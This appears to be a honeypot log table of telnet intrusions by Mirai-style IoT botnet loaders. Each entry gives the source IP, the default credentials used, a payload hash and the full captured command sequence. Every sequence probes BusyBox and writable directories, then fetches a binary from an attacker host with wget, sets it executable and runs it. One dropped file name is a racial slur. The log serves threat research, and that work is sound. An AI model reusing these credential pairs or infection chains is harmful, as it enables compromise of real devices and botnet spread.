| IP address |
User name |
Password |
SHA256 of the payload file |
 154.13.31.135
| admin | password | 8b8b06f5bf341b8a38225f66e2eb0f53c5d93d17118304b25eeee3b132f2fb3e |
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6a\x61\x6e\x65/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
cd /
/bin/busybox cp /bin/echo wlrMedcer; >wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://27.122.56.147:50505/bins/limit.m68k -O - > wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
./wlrMedcer telnet.m68k; /bin/busybox IHCCE
rm -rf upnp; > wlrMedcer; /bin/busybox ECCHI |
38.143.11.195 | root | | 1120f7ea5a60442b50672a0ad92b7a720e8fafe70a9b49df5dae0f5f76b12f3f |
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6a\x61\x6e\x65/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6a\x61\x6e\x65/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
cd /
/bin/busybox cp /bin/echo wlrMedcer; >wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://27.122.56.147:50505/bins/limit.ppc -O - > wlrMedcer; /bin/busybox chmod 777 wlrMedcer; /bin/busybox ECCHI
./wlrMedcer telnet.ppc; /bin/busybox IHCCE
rm -rf upnp; > wlrMedcer; /bin/busybox ECCHI |
 207.154.206.98
| admin | comcomcom | d776347c8346016c7461c751e2d6c11abaeb0e40c9ae93f475c2c524b9976cb7 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://207.154.206.98:80/bins/sora.m68k -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.m68k; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
 45.95.168.230
| admin | ho4uku6at | 0760ded20b9c710789544194f39cb02b1334e111d407e96de524f9d0b7d5a066 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xpWekc153Dcsa methSao
/bin/busybox cp /bin/busybox .xpWekc153Dcsa; >.xpWekc153Dcsa; /bin/busybox chmod 777 .xpWekc153Dcsa; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.95.168.230:80/0xxx0xxxasdajshdsajhkgdja/m3th.sh4 -O - > .xpWekc153Dcsa; /bin/busybox chmod 777 .xpWekc153Dcsa; /bin/busybox UNSTABLE
./.xpWekc153Dcsa selfrep.sh4; /bin/busybox ELBATSNU
/bin/busybox rm -rf methSao; >.xpWekc153Dcsa; /bin/busybox UNSTABLE |
192.119.71.209 | admin | aquario | ecd41b32686413e53f704155ba873c4d85ed4dcb81fed6164d019603661e528c |
enable
system
shell
sh
>/tmp/.slumpptest && cd /tmp/
>/var/.slumpptest && cd /var/
>/dev/.slumpptest && cd /dev/
>/mnt/.slumpptest && cd /mnt/
>/var/run/.slumpptest && cd /var/run/
>/var/tmp/.slumpptest && cd /var/tmp/
>/.slumpptest && cd /
>/dev/netslink/.slumpptest && cd /dev/netslink/
>/dev/shm/.slumpptest && cd /dev/shm/
>/bin/.slumpptest && cd /bin/
>/etc/.slumpptest && cd /etc/
>/boot/.slumpptest && cd /boot/
>/usr/.slumpptest && cd /usr/
/bin/busybox rm -rf excme WasdwD
/bin/busybox cp /bin/busybox excme; >excme; /bin/busybox chmod 777 excme; /bin/busybox KOWAI
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox KOWAI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox KOWAI
/bin/busybox wget http://205.185.125.59:80/bins/OneDrive.spc -O - > excme; /bin/busybox chmod 777 excme; /bin/busybox KOWAI
./excme telly.spc.wget; /bin/busybox VYBOR
/bin/busybox rm -rf WasdwD; >excme; /bin/busybox KOWAI |
192.81.212.39 | fliruser | 3vlig | 4efada502d60b5b05376cde2e90476b80c8e263806bb78a7e1c86d3de9b2e6e8 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf bb c
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HIITO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://192.81.212.39:80/swrgiuhguhwrguiwetu/arm -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c bb
/bin/busybox cp /bin/busybox bb; >bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HIITO
/bin/busybox wget http://192.81.212.39:80/swrgiuhguhwrguiwetu/arm7 -O - > bb; /bin/busybox chmod 777 bb; /bin/busybox HIITO
./bb load.wget; /bin/busybox SYLVEONSARECUTE
/bin/busybox rm -rf c; >bb; /bin/busybox HIITO |
 64.225.104.188
| telnet | telnet | c1ee78deba0a135d9982d969526403094e8fca4dafa2fdb6b76955c97b6b6afb |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://64.225.104.188:80/bins/sora.arm -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm; /bin/busybox BIGREP
/bin/busybox rm -rf dropper NiGGeR69xd
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://64.225.104.188:80/bins/sora.arm7 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm7; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
207.154.206.98 | admin | admin | 95e13893c2f76487bf847147ce0799e23dcdd257dd8c4fe041661a61a0e83fe4 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://207.154.206.98:80/bins/sora.sh4 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.sh4; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |